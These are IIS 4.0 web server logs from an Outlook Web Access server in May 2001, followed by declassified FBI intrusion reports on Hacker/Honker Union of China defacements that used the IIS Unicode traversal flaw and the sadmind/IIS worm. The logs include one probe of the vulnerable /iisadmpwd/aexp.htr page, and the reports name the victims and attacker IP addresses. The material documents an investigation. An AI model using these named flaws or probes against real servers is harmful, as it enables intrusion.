15:48:08 216.93.48.226 GET /exchange/USA/forms/reply.gif 200
15:48:08 216.93.48.226 GET /exchange/USA/forms/forward.gif 200
15:48:08 216.93.48.226 GET /exchange/USA/forms/ReplyFld.gif 200
15:48:08 216.93.48.226 GET /exchange/USA/forms/replyall.gif 200
15:48:08 216.93.48.226 GET /exchange/USA/forms/delmark.gif 200
15:48:08 216.93.48.226 GET /exchange/USA/forms/prevmsg.gif 200
15:48:08 216.93.48.226 GET /exchange/USA/forms/nextmsg.gif 200
15:48:08 216.93.48.226 GET /exchange/USA/forms/movepy.gif 200
15:48:16 216.93.48.226 GET /exchange/USA/forms/IPM/NOTE/frmRoot.asp 302
15:48:16 216.93.48.226 GET /exchange/USA/forms/IPM/NOTE/read.asp 200
15:48:32 216.93.48.226 GET /exchange/USA/forms/IPM/NOTE/frmRoot.asp 302
15:48:32 216.93.48.226 GET /exchange/USA/forms/IPM/NOTE/read.asp 200
15:48:46 216.93.48.226 GET /exchange/USA/inbox/messages.asp 200
15:48:52 216.93.48.226 GET /exchange/USA/forms/IPM/NOTE/frmRoot.asp 302
15:48:52 216.93.48.226 GET /exchange/USA/forms/IPM/NOTE/read.asp 200
15:49:05 216.93.48.226 GET /exchange/USA/forms/IPM/NOTE/frmRoot.asp 302
15:49:05 216.93.48.226 GET /exchange/USA/forms/IPM/NOTE/read.asp 200
15:49:56 216.93.48.226 GET /exchange/USA/inbox/messages.asp 200
15:49:56 216.93.48.226 GET /exchange/USA/images/urgent.gif 200
15:50:11 216.93.48.226 GET /exchange/USA/forms/IPM/NOTE/frmRoot.asp 302
15:50:11 216.93.48.226 GET /exchange/USA/forms/IPM/NOTE/read.asp 200
15:50:17 216.93.48.226 GET /exchange/USA/forms/IPM/NOTE/commands.asp 200
15:50:28 216.93.48.226 GET /exchange/USA/inbox/messages.asp 200
15:50:33 216.93.48.226 GET /exchange/USA/inbox/messages.asp 200
15:50:33 216.93.48.226 GET /exchange/USA/inbox/messages.asp 200
15:50:37 216.93.48.226 GET /exchange/USA/forms/IPM/NOTE/frmRoot.asp 302
15:50:37 216.93.48.226 GET /exchange/USA/forms/IPM/NOTE/read.asp 200
15:50:43 216.93.48.226 GET /exchange/USA/forms/IPM/NOTE/frmRoot.asp 302
15:50:43 216.93.48.226 GET /exchange/USA/forms/IPM/NOTE/read.asp 200
15:51:04 216.93.48.226 GET /exchange/USA/forms/IPM/NOTE/frmRoot.asp 302
15:51:04 216.93.48.226 GET /exchange/USA/forms/IPM/NOTE/read.asp 200
15:52:20 216.93.48.226 GET /exchange/USA/inbox/messages.asp 200
15:52:35 216.93.48.226 GET /exchange/USA/forms/IPM/NOTE/frmRoot.asp 302
15:52:35 216.93.48.226 GET /exchange/USA/forms/IPM/NOTE/read.asp 200

15:53:16 216.93.48.226 GET /exchange/USA/logoff.asp 200 
15:53:16 216.93.48.226 GET /exchange/USA/msie.gif 200 

15:53:16 216.93.48.226 GET /exchange/USA/msprod.gif 200 
17:39:41 24.30.89.109 GET /exchange/USA/logon.asp 200 

17:39:41 24.30.89.109 GET /exchange/USA/part1.gif 200 

17:39:41 24.30.89.109 GET /exchange/USA/back.jpg 200 

17:39:41 24.30.89.109 GET /exchange/USA/part2.gif 200 

17:39:45 24.30.89.109 GET /exchange/USA/msie.gif 200 

17:39:45 24.30.89.109 GET /exchange/USA/LogonFrm.asp 401 
17:39:51 24.30.89.109 GET /exchange/USA/msprod.gif 200 

17:39:51 24.30.89.109 GET /exchange/USA/LogonFrm.asp 302 
17:39:51 24.30.89.109 GET /exchange/USA/root.asp 200 

17:39:51 24.30.89.109 GET /exchange/USA/Navbar/nbInbox.asp 200 
17:39:51 24.30.89.109 GET /exchange/USA/inbox/main_fr.asp 200 
17:39:51 24.30.89.109 GET /exchange/USA/Navbar/inbox.gif 200 
17:39:51 24.30.89.109 GET /exchange/USA/Navbar/cal.gif 200 
17:39:51 24.30.89.109 GET /exchange/USA/Navbar/finduser.gif 200 
17:39:53 24.30.89.109 GET /exchange/USA/Navbar/public.gif 200 
17:39:53 24.30.89.109 GET /exchange/USA/Navbar/option.gif 200 
17:39:53 24.30.89.109 GET /exchange/USA/inbox/title.asp 200 
17:39:53 24.30.89.109 GET /exchange/USA/Navbar/logoff.gif 200 
17:39:53 24.30.89.109 GET /exchange/USA/inbox/peerfldr.asp 200 
17:39:53 24.30.89.109 GET /exchange/USA/inbox/messages.asp 200 
17:39:53 24.30.89.109 GET /exchange/USA/inbox/commands.asp 200 
17:39:53 24.30.89.109 GET /exchange/USA/images/divider.gif 200 
17:39:53 24.30.89.109 GET /exchange/USA/images/newmail.gif 200 
#Software: Microsoft Internet Information Server 4.0
#Version: 1.0
#Date: 2001-05-05 04:31:43
#Fields: time c-ip cs-method cs-uri-stem sc-status
[time and c-ip columns of the following records not recovered]

GET /exchange/USA/logon.asp 200
GET /exchange/USA/back.jpg 200
GET /exchange/USA/part1.gif 200
GET /exchange/USA/LogonFrm.asp 401
GET /exchange/USA/LogonFrm.asp 302
GET /exchange/USA/root.asp 200
GET /exchange/USA/inbox/main_fr.asp 200
GET /exchange/USA/Navbar/nbInbox.asp 200
GET /exchange/USA/Navbar/inbox.gif 200
GET /exchange/USA/Navbar/cal.gif 200
GET /exchange/USA/Navbar/finduser.gif 200
GET /exchange/USA/Navbar/public.gif 200
GET /exchange/USA/Navbar/option.gif 200
GET /exchange/USA/Navbar/logoff.gif 200
GET /exchange/USA/inbox/title.asp 200
GET /exchange/USA/inbox/peerfldr.asp 200
GET /exchange/USA/inbox/messages.asp 200
GET /exchange/USA/inbox/commands.asp 200
GET /exchange/USA/images/divider.gif 200
GET /exchange/USA/images/newmail.gif 200
GET /exchange/USA/images/newpost.gif 200
GET /exchange/USA/images/refresh.gif 200
GET /exchange/USA/images/movepy.gif 200
GET /exchange/USA/images/delmsg.gif 200
GET /exchange/USA/images/newfoldr.gif 200
GET /exchange/USA/images/delfoldr.gif 200
GET /exchange/USA/images/empfldr.gif 200
GET /exchange/USA/images/mffav.gif 200
GET /exchange/USA/images/arwtanlf.gif 200
GET /exchange/USA/images/arwtanrt.gif 200
GET /exchange/USA/images/help.gif 200
GET /exchange/USA/images/mark.gif 200
GET /exchange/USA/inbox/urgent.gif 200
GET /exchange/USA/inbox/envelope.gif 200
GET /exchange/USA/inbox/papclip.gif 200
GET /exchange/USA/images/envelope.gif 200
GET /exchange/USA/images/upone.gif 200
GET /exchange/USA/images/inbox.gif 200
POST /exchange/USA/inbox/commands.asp 200
GET /exchange/USA/images/papclip.gif 200
GET /exchange/USA/inbox/commands.asp 200
GET /exchange/USA/inbox/peerfldr.asp 200
GET /exchange/USA/inbox/title.asp 200
GET /exchange/USA/inbox/messages.asp 200
POST /exchange/USA/inbox/commands.asp 200
GET /exchange/USA/inbox/commands.asp 200
GET /exchange/USA/inbox/peerfldr.asp 200
GET /exchange/USA/inbox/title.asp 200
GET /exchange/USA/inbox/messages.asp 200
GET /exchange/USA/inbox/commands.asp 200


[time column not recovered; c-ip truncated to its last octet, and absent with cs-method in the final records]
.189 GET /exchange/USA/logon.asp 200
.189 GET /exchange/USA/part2.gif 200
.189 GET /exchange/USA/back.jpg 200
.189 GET /exchange/USA/LogonFrm.asp 401
.189 GET /exchange/USA/msie.gif 200
.189 GET /exchange/USA/part1.gif 200
.189 GET /exchange/USA/LogonFrm.asp 302
.189 GET /exchange/USA/root.asp 200
.189 GET /exchange/USA/Navbar/nbInbox.asp 200
.189 GET /exchange/USA/inbox/main_fr.asp 200
.189 GET /exchange/USA/Navbar/inbox.gif 200
.189 GET /exchange/USA/Navbar/cal.gif 200
.189 GET /exchange/USA/inbox/title.asp 200
.189 GET /exchange/USA/Navbar/finduser.gif
.189 GET /exchange/USA/inbox/peerfldr.asp 200
.189 GET /exchange/USA/Navbar/public.gif 200
.189 GET /exchange/USA/Navbar/logoff.gif 200
.189 GET /exchange/USA/Navbar/option.gif 200
.189 GET /exchange/USA/images/divider.gif 200
.189 GET /exchange/USA/images/newmail.gif 200
.189 GET /exchange/USA/images/newpost.gif 200
.189 GET /exchange/USA/images/delfoldr.gif
.189 GET /exchange/USA/images/mffav.gif 200
.189 GET /exchange/USA/images/arwtanrt.gif
.189 GET /exchange/USA/images/upone.gif 200
.189 GET /exchange/USA/images/refresh.gif 200
.189 GET /exchange/USA/images/inbox.gif 200
.189 GET /exchange/USA/images/mark.gif 200
.189 GET /exchange/USA/inbox/flagcomp.gif 200
.189 GET /exchange/USA/inbox/urgent.gif 200
.189 GET /exchange/USA/images/movepy.gif 200
.189 GET /exchange/USA/inbox/messages.asp 200
/exchange/USA/inbox/peerfldr.asp 200
/exchange/USA/inbox/title.asp 200
/exchange/USA/inbox/messages.asp 200
/exchange/USA/images/mailbox.gif 200
/exchange/USA/images/folder.gif 200
/exchange/USA/images/calendar.gif 200
/exchange/USA/images/deleted.gif 200
/exchange/USA/images/outbox.gif 200
/exchange/USA/inbox/commands.asp 200
/exchange/USA/inbox/peerfldr.asp 200
/exchange/USA/inbox/title.asp 200
/exchange/USA/inbox/messages.asp 200
/exchange/USA/images/oof.gif 200
/exchange/USA/logoff.asp 200
/exchange/USA/back.jpg 206
/exchange/USA/part1.gif 206
/exchange/USA/msie.gif 200
/exchange/USA/part2.gif 200
/exchange/USA/msprod.gif 200



16:58:08 168.191.112.189 GET /exchange/USA/inbox/commands.asp 200
16:59:01 168.191.112.189 POST /exchange/USA/inbox/commands.asp
16:59:01 168.191.112.189 GET /exchange/USA/images/newfoldr.gif
16:59:01 168.191.112.189 GET /exchange/USA/inbox/commands.asp 200
16:59:05 168.191.112.189 GET /exchange/USA/images/arwtanlf.gif
16:59:05 168.191.112.189 GET /exchange/USA/inbox/peerfldr.asp 200
16:59:05 168.191.112.189 GET /exchange/USA/images/delmsg.gif 200
16:59:05 168.191.112.189 GET /exchange/USA/inbox/title.asp 200
16:59:05 168.191.112.189 GET /exchange/USA/images/help.gif 200
16:59:09 168.191.112.189 GET /exchange/USA/inbox/messages.asp 200
16:59:16 168.191.112.189 GET /exchange/USA/images/empfldr.gif 200
16:59:16 168.191.112.189 GET /exchange/USA/forms/IPM/NOTE/frmRoot.asp 302
16:59:16 168.191.112.189 GET /exchange/USA/images/papclip.gif 200
16:59:16 168.191.112.189 GET /exchange/USA/forms/IPM/NOTE/read.asp 200
16:59:16 168.191.112.189 GET /exchange/USA/inbox/papclip.gif 200
16:59:18 168.191.112.189 GET /exchange/USA/inbox/envelope.gif 200
16:59:18 168.191.112.189 GET /exchange/USA/images/envelope.gif
16:59:18 168.191.112.189 GET /exchange/USA/forms/reply.gif 200
16:59:22 168.191.112.189 GET /exchange/USA/forms/ReplyFld.gif 200
16:59:22 168.191.112.189 GET /exchange/USA/forms/forward.gif 200
16:59:22 168.191.112.189 GET /exchange/USA/forms/delmark.gif 200
16:59:41 168.191.112.189 GET /exchange/USA/forms/replyall.gif 200
16:59:41 168.191.112.189 GET /exchange/USA/forms/IPM/NOTE/frmRoot.asp 302
16:59:41 168.191.112.189 GET /exchange/USA/forms/nextmsg.gif 200
16:59:41 168.191.112.189 GET /exchange/USA/forms/IPM/NOTE/read.asp 200
17:00:06 168.191.112.189 GET /exchange/USA/Attach/generic.gif 200
17:00:06 168.191.112.189 GET /exchange/USA/forms/IPM/NOTE/commands.asp 200
17:00:06 168.191.112.189 GET /exchange/USA/forms/movepy.gif 200
17:00:06 168.191.112.189 GET /exchange/USA/forms/IPM/NOTE/frmRoot.asp 200
17:00:10 168.191.112.189 GET /exchange/USA/forms/prevmsg.gif 200
17:00:10 168.191.112.189 GET /exchange/USA/forms/IPM/NOTE/cmpTitle.asp 200
17:00:10 168.191.112.189 GET /exchange/USA/forms/IPM/NOTE/cmpMsg.asp 200
17:00:10 168.191.112.189 GET /exchange/USA/forms/IPM/NOTE/commands.asp 200
17:00:13 168.191.112.189 GET /exchange/USA/forms/send.gif 200
17:00:13 168.191.112.189 GET /exchange/USA/forms/save.gif 200
17:00:13 168.191.112.189 GET /exchange/USA/forms/high.gif 200
17:00:16 168.191.112.189 GET /exchange/USA/forms/low.gif 200
17:00:16 168.191.112.189 GET /exchange/USA/forms/tabrcor.gif 200
17:00:16 168.191.112.189 GET /exchange/USA/forms/tablcor.gif 200
17:00:16 168.191.112.189 GET /exchange/USA/forms/tabrline.gif 200
17:10:44 168.191.112.189 GET /exchange/USA/forms/tabWdot.gif 200
17:10:44 168.191.112.189 POST /exchange/USA/forms/IPM/NOTE/commands.asp 200
17:10:48 168.191.112.189 GET /exchange/USA/forms/tabWdot.gif 200
17:10:48 168.191.112.189 GET /exchange/USA/forms/IPM/NOTE/frmRoot.asp 302
17:10:48 168.191.112.189 GET /exchange/USA/forms/tabWdot.gif 200
17:10:48 168.191.112.189 GET /exchange/USA/forms/IPM/NOTE/read.asp 200
17:11:10 168.191.112.189 GET /exchange/USA/forms/tabWdot.gif 200
17:11:10 168.191.112.189 GET /exchange/USA/forms/IPM/NOTE/frmRoot.asp 302
17:11:10 168.191.112.189 GET /exchange/USA/forms/IPM/NOTE/read.asp 200
17:11:22 168.191.112.189 GET /exchange/USA/forms/IPM/NOTE/frmRoot.asp 302
17:11:22 168.191.112.189 GET /exchange/USA/forms/IPM/NOTE/read.asp 200
17:11:52 168.191.112.189 GET /exchange/USA/forms/IPM/NOTE/commands.asp 200
17:11:52 168.191.112.189 GET /exchange/USA/forms/IPM/NOTE/frmRoot.asp 200
17:11:55 168.191.112.189 GET /exchange/USA/forms/IPM/NOTE/cmpTitle.asp 200
17:11:55 168.191.112.189 GET /exchange/USA/forms/IPM/NOTE/cmpMsg.asp 200
17:11:55 168.191.112.189 GET /exchange/USA/forms/IPM/NOTE/commands.asp 200
17:14:15 168.191.112.189 POST /exchange/USA/forms/IPM/NOTE/commands.asp 200
17:14:24 168.191.112.189 GET /exchange/USA/forms/IPM/NOTE/frmRoot.asp 302
17:14:24 168.191.112.189 GET /exchange/USA/forms/IPM/NOTE/read.asp 200
17:14:44 168.191.112.189 GET /exchange/USA/forms/IPM/NOTE/commands.asp 200
17:14:44 168.191.112.189 GET /exchange/USA/forms/IPM/NOTE/frmRoot.asp 200
17:14:47 168.191.112.189 GET /exchange/USA/forms/IPM/NOTE/cmpTitle.asp 200
17:14:47 168.191.112.189 GET /exchange/USA/forms/IPM/NOTE/cmpMsg.asp 200
17:14:47 168.191.112.189 GET /exchange/USA/forms/IPM/NOTE/commands.asp 200
17:15:45 168.191.112.189 POST /exchange/USA/forms/IPM/NOTE/commands.asp 200
17:15:54 168.191.112.189 GET /exchange/USA/options/set.asp 200
17:16:27 168.191.112.189 POST /exchange/USA/options/set.asp 200
17:16:32 168.191.112.189 GET /exchange/USA/calendar/main_fr.asp 200
17:16:35 168.191.112.189 GET /exchange/USA/calendar/title.asp 200
17:16:35 168.191.112.189 GET /exchange/USA/calendar/events.asp 200
17:16:35 168.191.112.189 GET /exchange/USA/calendar/appts.asp 200
17:16:42 168.191.112.189 GET /exchange/USA/calendar/pick.asp 200
[time, c-ip and cs-method columns of the following records not recovered]
/exchange/USA/images/newappt.gif 200
/exchange/USA/calendar/events.asp
/exchange/USA/images/newmtg.gif 200
/exchange/USA/calendar/appts.asp 200
/exchange/USA/calendar/left.gif 200
/exchange/USA/calendar/right.gif 200



#Software: Microsoft Internet Information Server 4.0
#Version: 1.0
#Date: 2001-05-07 13:15:43
#Fields: time c-ip cs-method cs-uri-stem sc-status
13:15:43 128.100.208.135 GET /exchange/USA/Default.htm 200
13:15:43 128.100.208.135 GET /exchange/USA/logon.asp 200
13:15:43 128.100.208.135 GET /exchange/USA/part2.gif 200
13:16:14 128.100.208.135 GET /exchange/USA/back.jpg 200
13:16:14 128.100.208.135 GET /exchange/USA/LogonFrm.asp 401
13:16:23 128.100.208.135 GET /iisadmpwd/aexp.htr 200
13:17:41 128.100.208.135 GET /exchange/USA/part1.gif 200
13:24:03 128.100.208.135 GET /exchange/USA/msie.gif 200
13:30:27 128.100.208.135 GET /exchange/USA/msprod.gif 200
13:35:44 63.146.80.30 GET /Default.htm 200
13:35:44 63.146.80.30 GET /exchange/USA/Default.htm 304
13:35:44 63.146.80.30 GET /exchange/USA/logon.asp 200
13:35:44 63.146.80.30 GET /exchange/USA/back.jpg 304
13:35:44 63.146.80.30 GET /exchange/USA/part1.gif 304
13:35:44 63.146.80.30 GET /exchange/USA/part2.gif 304
13:35:44 63.146.80.30 GET /exchange/USA/msie.gif 304
13:36:45 63.146.80.30 GET /exchange/USA/msprod.gif 304
13:50:31 63.146.80.30 GET /Default.htm 304
14:03:50 63.146.80.20 GET /Default.htm 200

#Software: Microsoft Internet Information Server 4.0
#Version: 1.0
#Date: 2001-05-07 18:07:04
#Fields: time c-ip cs-method cs-uri-stem sc-status
18:07:04 63.146.80.3 GET /exchange/USA/Default.htm 304
18:07:08 63.146.80.3 GET /exchange/USA/logon.asp 200
18:07:08 63.146.80.3 GET /exchange/USA/back.jpg 304
18:07:08 63.146.80.3 GET /exchange/USA/part1.gif 304
18:07:08 63.146.80.3 GET /exchange/USA/part2.gif 304
18:08:13 63.146.80.3 GET /exchange/USA/msie.gif 304
18:08:13 63.146.80.3 GET /exchange/USA/msprod.gif 304
18:11:50 63.146.80.3 GET /exchange/USA/logon.asp 200
18:11:50 63.146.80.3 GET /exchange/USA/back.jpg 304
18:11:50 63.146.80.3 GET /exchange/USA/part1.gif 304
18:11:50 63.146.80.3 GET /exchange/USA/part2.gif 304
18:11:50 63.146.80.3 GET /exchange/USA/msie.gif 304
18:12:35 63.146.80.3 GET /exchange/USA/msprod.gif 304
18:12:35 63.146.80.3 GET /exchange/USA/logon.asp 200
18:12:35 63.146.80.3 GET /exchange/USA/back.jpg 304
18:12:35 63.146.80.3 GET /exchange/USA/part1.gif 304
18:12:35 63.146.80.3 GET /exchange/USA/part2.gif 304
18:12:35 63.146.80.3 GET /exchange/USA/msie.gif 304
18:12:35 63.146.80.3 GET /exchange/USA/msprod.gif 304
18:12:35 63.146.80.3 GET /exchange/USA/logon.asp 200
18:12:35 63.146.80.3 GET /exchange/USA/back.jpg 304
18:12:35 63.146.80.3 GET /exchange/USA/part1.gif 304
18:12:35 63.146.80.3 GET /exchange/USA/part2.gif 304
18:12:35 63.146.80.3 GET /exchange/USA/msie.gif 304
18:12:50 63.146.80.3 GET /exchange/USA/msprod.gif 304
18:12:50 63.146.80.3 GET /exchange/USA/LogonFrm.asp 401
18:12:59 63.146.80.3 GET /exchange/USA/LogonFrm.asp 302
[time, c-ip and cs-method columns of the following records not recovered]
/exchange/USA/root.asp 200
/exchange/USA/Navbar/nbInbox.asp 200
/exchange/USA/Navbar/inbox.gif 304
/exchange/USA/Navbar/cal.gif 304
/exchange/USA/Navbar/finduser.gif 304
/exchange/USA/Navbar/public.gif 304
/exchange/USA/Navbar/option.gif 304
/exchange/USA/inbox/main_fr.asp 200
/exchange/USA/Navbar/logoff.gif 304
/exchange/USA/inbox/title.asp 200
/exchange/USA/inbox/peerfldr.asp 200
/exchange/USA/inbox/messages.asp 200
/exchange/USA/inbox/commands.asp 200
/exchange/USA/images/divider.gif 304
/exchange/USA/images/newpost.gif 304
/exchange/USA/images/refresh.gif 304
/exchange/USA/images/newmail.gif 304
/exchange/USA/images/delmsg.gif 304
/exchange/USA/images/newfoldr.gif 304
/exchange/USA/images/movepy.gif 304
/exchange/USA/images/empfldr.gif 304
/exchange/USA/images/delfoldr.gif 304
/exchange/USA/images/mffav.gif 304
/exchange/USA/images/arwtanrt.gif 304
/exchange/USA/images/arwtanlf.gif 304
/exchange/USA/images/help.gif 304
/exchange/USA/images/mark.gif 304
/exchange/USA/inbox/envelope.gif 304
/exchange/USA/inbox/urgent.gif 304
/exchange/USA/inbox/papclip.gif 304
/exchange/USA/images/envelope.gif 304
/exchange/USA/images/upone.gif 304
/exchange/USA/forms/IPM/NOTE/frmRoot.asp
/exchange/USA/images/inbox.gif 304
/exchange/USA/forms/IPM/NOTE/read.asp
/exchange/USA/forms/reply.gif 304
/exchange/USA/forms/replyall.gif 304
/exchange/USA/forms/ReplyFld.gif 304
/exchange/USA/forms/forward.gif 304
/exchange/USA/forms/movepy.gif 304
/exchange/USA/forms/delmark.gif 304
/exchange/USA/forms/prevmsg.gif 304
/exchange/USA/forms/nextmsg.gif 304
/exchange/USA/forms/IPM/NOTE/frmRoot.asp
/exchange/USA/forms/IPM/NOTE/read.asp
/exchange/USA/root.asp 200
/exchange/USA/Navbar/nbInbox.asp 200
/exchange/USA/inbox/main_fr.asp 200
/exchange/USA/Navbar/inbox.gif 304
/exchange/USA/Navbar/cal.gif 304


[time and c-ip columns not recovered; cs-method also missing from the later records]
GET /exchange/USA/Navbar/finduser.gif 304
GET /exchange/USA/Navbar/public.gif 304
GET /exchange/USA/inbox/title.asp 200
GET /exchange/USA/inbox/peerfldr.asp 200
GET /exchange/USA/inbox/messages.asp 200
GET /exchange/USA/inbox/commands.asp 200
GET /exchange/USA/Navbar/option.gif 304
GET /exchange/USA/Navbar/logoff.gif 304
GET /exchange/USA/images/divider.gif 304
GET /exchange/USA/images/delmsg.gif 304
GET /exchange/USA/images/newmail.gif 304
GET /exchange/USA/images/newpost.gif 304
GET /exchange/USA/images/refresh.gif 304
GET /exchange/USA/images/movepy.gif 304
GET /exchange/USA/images/newfoldr.gif 304
GET /exchange/USA/images/empfldr.gif 304
GET /exchange/USA/images/arwtanlf.gif 304
GET /exchange/USA/images/delfoldr.gif 304
GET /exchange/USA/images/arwtanrt.gif 304
GET /exchange/USA/images/help.gif 304
GET /exchange/USA/images/mark.gif 304
GET /exchange/USA/inbox/envelope.gif 304
GET /exchange/USA/inbox/papclip.gif 304
GET /exchange/USA/images/mffav.gif 304
GET /exchange/USA/images/envelope.gif 304
GET /exchange/USA/inbox/urgent.gif 304
GET /exchange/USA/images/upone.gif 304
GET /exchange/USA/root.asp 200
GET /exchange/USA/images/inbox.gif 304
GET /exchange/USA/Navbar/nbInbox.asp 200
GET /exchange/USA/inbox/main_fr.asp 200
GET /exchange/USA/Navbar/inbox.gif 304
GET /exchange/USA/Navbar/cal.gif 304
GET /exchange/USA/Navbar/finduser.gif 304
GET /exchange/USA/Navbar/public.gif 304
GET /exchange/USA/inbox/title.asp 200
GET /exchange/USA/inbox/peerfldr.asp 200
GET /exchange/USA/inbox/messages.asp 200
GET /exchange/USA/inbox/commands.asp 200
GET /exchange/USA/Navbar/option.gif 304
GET /exchange/USA/Navbar/logoff.gif 304
GET /exchange/USA/images/divider.gif 304
GET /exchange/USA/images/newmail.gif 304
GET /exchange/USA/images/newpost.gif 304
GET /exchange/USA/images/refresh.gif 304
GET /exchange/USA/images/movepy.gif 304
GET /exchange/USA/images/delmsg.gif 304
GET /exchange/USA/images/newfoldr.gif 304
GET /exchange/USA/images/delfoldr.gif 304
GET /exchange/USA/images/empfldr.gif 304
GET /exchange/USA/images/mffav.gif 304
GET /exchange/USA/images/arwtanlf.gif 304
GET /exchange/USA/images/arwtanrt.gif 304
GET /exchange/USA/images/help.gif 304
/exchange/USA/images/mark.gif 304
/exchange/USA/inbox/urgent.gif 304
/exchange/USA/inbox/envelope.gif 304
/exchange/USA/inbox/papclip.gif 304
/exchange/USA/images/envelope.gif 304
/exchange/USA/images/upone.gif 304
/exchange/USA/images/inbox.gif 304
/exchange/USA/Default.htm 304
/exchange/USA/logon.asp 200
/exchange/USA/back.jpg 304
/exchange/USA/part1.gif 304
/exchange/USA/part2.gif 304
/exchange/USA/msie.gif 304
/ 403
/exchange/USA/msprod.gif 304
/exchange/USA/logon.asp 200
/exchange/USA/LogonFrm.asp 401
/exchange/USA/LogonFrm.asp 302
/exchange/USA/root.asp 200
/exchange/USA/Navbar/nbInbox.asp 200
/exchange/USA/inbox/main_fr.asp 200
/exchange/USA/Navbar/inbox.gif 304
/exchange/USA/Navbar/cal.gif 304
/exchange/USA/Navbar/finduser.gif 304
/exchange/USA/inbox/title.asp 200
/exchange/USA/inbox/peerfldr.asp 200
/exchange/USA/inbox/messages.asp 200
/exchange/USA/inbox/commands.asp 200
/exchange/USA/Navbar/public.gif 304
/exchange/USA/Navbar/option.gif 304
/exchange/USA/images/newmail.gif 304
/exchange/USA/Navbar/logoff.gif 304
/exchange/USA/images/divider.gif 304
/exchange/USA/images/newpost.gif 304
/exchange/USA/images/refresh.gif 304
/exchange/USA/images/movepy.gif 304
/exchange/USA/images/delmsg.gif 304
/exchange/USA/images/newfoldr.gif 304
/exchange/USA/images/delfoldr.gif 304
/exchange/USA/images/empfldr.gif 304
/exchange/USA/images/arwtanlf.gif 304
/exchange/USA/images/mffav.gif 304
/exchange/USA/images/arwtanrt.gif 304
/exchange/USA/images/help.gif 304
/exchange/USA/images/mark.gif 304
/exchange/USA/inbox/urgent.gif 304
/exchange/USA/inbox/envelope.gif 304
/exchange/USA/inbox/papclip.gif 304
/exchange/USA/images/upone.gif 304
/exchange/USA/images/inbox.gif 304
/exchange/USA/images/envelope.gif 304
FD-801 (Rev. 7-15-97)

IP/C

FEDERAL BUREAU OF INVESTIGATION

Precedence: ROUTINE Date: 05/24/2001
To: Counterterrorism Attn: NIPC, CIOS/CIU
Room 5965
SA b3
b6
Attn: SA b7C
b7E
From: Detroit
Approved By:
Drafted By:
Case ID #:
Title: Subject: Hacker/Honker Union of China
Victim: Chicago Systems Group
Type: Intrusion
Date: 04/03/01
SUBMISSION: [ ] Initial [X] Supplemental [ ] Closed
CASE OPENED: / /
CASE CLOSED: / /
[ ] No action due to state/local prosecution (Name/Number )
[ ] USA declination
[ ] Referred to Another Federal Agency (Name/Number: )
[ ] Placed in unaddressed work
[ ] Closed administratively
[ ] Conviction
COORDINATION: FBI Field Office: Chicago
Government Agency
Private Corporation
Company name/Government agency: The Journal of Clinical Investigation
Address/location: 35 Research Dr, Suite 300
Ann Arbor, Michigan 48103
Purpose of System: Mail and file server.
Highest classification of information stored in system: N/A
b3 


b7E 


To: Counterterrorism From: Detroit
Re: Date 05/09/2001


System Data:
Hardware/configuration (CPU): DELL, Pentium III
Operating System: Windows NT 4.0 service pack 5
Software: Microsoft IIS version 4


Security Features:
Security Software Installed: [ ] yes (identify ) [X] no
Logon Warning Banner: [ ] yes [X] no
INTRUSION INFORMATION
Access for intrusion: [X] Internet connection [ ] dial-up number [ ] LAN (insider)
If Internet: Internet address: 63.146.80.3
Network name: www.the-jci.org


Method:
Technique(s) used in intrusion: Microsoft IIS Extended Unicode Directory Traversal Vulnerability (also sadmind/IIS worm)
Path of intrusion:
addresses: 1. 211.97.114.240
country: 1. China
facility: 1. China United Telecom Corp


Subject: 
Age: Race: 
Sex: Education: 
Alias(s): Motive: 
Group Affiliation: 
Employer: 
Known Accomplices: 
Equipment used: 
Hardware/configuration (CPU): 
Operating System: 
Software: 
Impact: 


Compromise of classified information: [ ] yes [X] no
Estimated number of computers affected: One
Estimated dollar loss to date: $400.00


To: Counterterrorism From: Detroit
Re: Date 05/09/2001 b3

b7E
Category of Crime:
Impairment: Theft of Information:
[ ] Malicious code inserted [ ] Classified information compromised
[ ] Denial of service [ ] Unclassified information compromised
[ ] Destruction of information/software [ ] Passwords obtained
[X] Modification of information/software [ ] Computer processing time obtained
[ ] Telephone services obtained
[ ] Application software obtained
[ ] Operating software obtained
Intrusion:
[X] Unauthorized access
[ ] Exceeding authorized access
REMARKS
The victim site, www.the-jci.org, is only used as a mail and file server.
There is no firewall which protects this server.
b6
b7C
found the altered files on Monday, May 7, 2001, which read "Fuck USA Government", "Fuck Poizon BOx", and "Contact sysadmcn@yahoo.com.cn".


(Rev. 08-28-2000)


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 06/06/2001 


To: Chicago Attn: IP/
SA
From: Charlotte
Squad 7, Raleigh Resident Agency
Contact: 919-859-7312
Approved By:
Drafted By:
Case ID #: (Pending)
Title: HACKER/HONKER UNION OF CHINA;
ILLINOIS SECRETARY OF STATE - VICTIM;
INTRUSION - INFO SYSTEMS
04/03/2001
OO: CG


Synopsis: For information of the file, a State of North Carolina 
computer system suffered a sadmind/IIS attack. Damage determined 
to be negligible. 


Details: For information of the file, a State of North Carolina
computer system suffered a sadmind/IIS attack. It was reported on
06/01/01, by [redacted], State of North Carolina, Information Technology
Services. [Redacted] advised the attacker attempted to replace the default
web page via the sadmind/IIS attack as documented in the CERT Advisory
CA-2001-11. Damage was reported to be negligible.


The attack, which occurred on 05/22/01, targeted a 
State of North Carolina computer with the IP address of: 
149.168.119.219. The attack emanated from the IP address of: 
202.204.113.13 which was reported to belong to the Beijing 
Forestry University in China. 


This information is being forwarded to Chicago for 
whatever action deemed appropriate. No further investigation 
will be conducted by Charlotte at this time. 


b3
b7E

To: Chicago From: Charlotte
b7E


LEAD (s): 
Set Lead 1: (Adm) 
CHICAGO 


AT CHICAGO, IL 


Read and Clear. 




FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/23/2001
To: Counterterrorism Attn: NIPC-CIU (Rm 5965)
b3
Chicago Attn: SA b6
b7C
From: Washington Field b7E
NS-18/NVRA
Contact: SA (703) 762-3146
Approved By:
Drafted By:
Case ID #:
Title: Subject: UNSUB(S);
Victim: INTER-AMERICAN DEFENSE BOARD;
Type: INTRUSION - INFORMATION SYSTEMS
Date: 05/03/2001
SUBMISSION: [ ] Initial [ ] Supplemental [X] Closed
CASE OPENED: 05/24/2001
CASE CLOSED:
[ ] No action due to state/local prosecution (Name/Number )
[ ] USA declination
[ ] Referred to Another Federal Agency (Name/Number: )
[X] Placed in unaddressed work
[ ] Closed administratively
[ ] Conviction
COORDINATION: FBI Field Office
Government Agency
Private Corporation
VICTIM
Company name/Government agency: Inter-American Defense Board
Address/location: 2600 16th Street,
Washington, D.C. 20441
b3
b7C
